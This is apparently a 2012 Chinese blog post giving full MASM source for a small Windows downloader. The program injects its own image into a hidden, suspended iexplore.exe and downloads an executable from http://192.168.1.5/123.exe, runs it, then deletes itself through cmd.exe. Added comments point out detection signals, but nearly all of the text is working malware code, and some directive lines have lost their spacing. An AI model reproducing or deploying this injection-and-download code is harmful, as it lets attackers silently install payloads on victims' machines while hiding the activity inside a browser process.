无DLL,插IE下载者 3.5K
(2012-05-18 12:13:27)
.386
.modelflat,stdcall
optioncasemap:none
includewindows.inc
includeurlmon.inc
includeuser32.inc
includekernel32.inc
includelibuser32.lib
includeliburlmon.lib
includelibkernel32.lib
Downloadproto
.data
; Fixed-size string fields used by the injected Download thread: the
; urlmon module name, the source URL (a LAN address in this listing) and
; the local drop path. Each is zero-padded to a fixed length, which also
; makes them stable byte patterns for file-based IoC matching.
szUrlmon db "urlmon.dll",0
szURL db " http://192.168.1.5/123.exe",24 dup (0)
szFile db "c:\test.exe",39 dup (0)
; Host process that start: launches suspended and writes its own image into.
szCmdline db "c:\program files\internet explorer\iexplore.exe",0
; Fragments of the self-delete command assembled at deleteSelf:
;   <system dir>\cmd.exe /c del "<own path>"
szAdddb '\cmd.exe /c del "',0
quotedb '"',0
.data?
cbSizeDWORD ?                   ; SizeOfImage read from this module's own PE header
cdWrittenDWORD ?                ; bytes written by WriteProcessMemory
pidDWORD ?                      ; PID of the suspended iexplore.exe
hProcessDWORD ?                 ; handle from OpenProcess(PROCESS_ALL_ACCESS)
hModuleDWORD ?                  ; own image base (GetModuleHandle(0))
hThreadDWORD ?                  ; remote thread handle
startupinfoSTARTUPINFO <?>
piPROCESS_INFORMATION <>
SelfPathdb MAX_PATH dup (?)     ; own full path (GetModuleFileName)
szCmddb MAX_PATH dup (?)        ; assembled self-delete command line
.code
;-----------------------------------------------------------------------
; start - entry point. Flow as written in this listing:
;   1. read SizeOfImage from this module's own PE optional header;
;   2. launch iexplore.exe hidden and suspended (it is never resumed here);
;   3. allocate RWX memory in it at this module's own base, copy the whole
;      image across, and run Download there with CreateRemoteThread;
;   4. wait for that thread, then delete this executable through
;      "cmd.exe /c del" and exit.
; Defender view: steps 2-3 are the well-known suspended-process injection
; chain (CreateProcess CREATE_SUSPENDED -> VirtualAllocEx RWX ->
; WriteProcessMemory -> CreateRemoteThread into a browser). Every call is
; a separate telemetry event, and a browser process holding an executable
; region that is backed by no file on disk is the memory artifact to look
; for. The self-delete leaves the cmd.exe process-creation record behind
; even though the file itself is gone.
;-----------------------------------------------------------------------
start:
invoke GetModuleHandle,0
mov hModule,eax                 ; own image base
mov edi,eax
assume edi:ptr IMAGE_DOS_HEADER
add edi,[edi].e_lfanew          ; -> PE signature
add edi,sizeof DWORD            ; -> IMAGE_FILE_HEADER
assume edi:ptr IMAGE_FILE_HEADER
add edi,sizeof IMAGE_FILE_HEADER ; -> IMAGE_OPTIONAL_HEADER32
assume edi:ptr IMAGE_OPTIONAL_HEADER32
mov eax,[edi].SizeOfImage
mov cbSize,eax                  ; number of bytes to copy into the target
lea esi,offset startupinfo
assume esi:ptr STARTUPINFO
mov [esi].cb,sizeof STARTUPINFO
invoke GetStartupInfo,offset startupinfo
mov [esi].wShowWindow,SW_HIDE   ; the host browser never shows a window
mov [esi].dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES
; Launch the host browser with its primary thread suspended.
invoke createProcess,offset
szCmdline,NULL,NULL,NULL,FALSE,create_SUSPENDED,NULL,NULL,offsetstartupinfo,offset pi
lea esi,offset pi
assume esi:ptr PROCESS_INFORMATION
mov eax,[esi].dwProcessId
mov pid,eax
; Re-opens the child by PID with full access although pi already holds
; a process handle.
invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,pid
mov hProcess,eax
; RWX allocation requested at this module's own base, so addresses inside
; the copied image (including Download) are the same in both processes.
invoke VirtualAllocEx,hProcess,hModule,cbSize,MEM_COMMIT or
MEM_RESERVE,PAGE_EXECUTE_READWRITE
invoke WriteProcessMemory,hProcess,eax,hModule,cbSize,offset cdWritten
; Start Download inside the browser, passing hModule as its parameter.
invoke createRemoteThread,hProcess,0,0,addr Download,hModule,0,ebx
mov hThread,eax
invoke WaitForSingleObject,hThread,INFINITE   ; block until the remote thread ends
invoke CloseHandle,hThread
invoke CloseHandle,hProcess
deleteSelf:
; Build "<system dir>\cmd.exe /c del "<own path>"" in szCmd, run it hidden
; after a short delay, then exit (presumably so the delete succeeds once
; this image is no longer mapped).
invoke GetModuleFileName,NULL,offset SelfPath,MAX_PATH
invoke GetSystemDirectory,offset szCmd,MAX_PATH
invoke lstrcat,offset szCmd,offset szAdd
invoke lstrcat,offset szCmd,offset SelfPath
invoke lstrcat,offset szCmd,offset quote
invoke Sleep,200
invoke WinExec,offset szCmd,SW_HIDE
invoke ExitProcess,0
;-----------------------------------------------------------------------
; Download - body of the thread created inside iexplore.exe.
; Loads urlmon.dll, fetches szURL to szFile, launches the file visibly,
; then ends the thread. Because it runs in the browser's process, both
; the cleartext HTTP request and the newly spawned executable appear to
; originate from iexplore.exe; a browser writing a .exe to the drive root
; and immediately launching it is the behavioural signal to alert on.
;-----------------------------------------------------------------------
Downloadproc
invoke LoadLibrary,offset szUrlmon
invoke URLDownloadToFile,NULL,offset szURL,offset szFile,0,NULL
invoke WinExec,offset szFile,SW_SHOW
invoke ExitThread,0
Downloadendp
endstart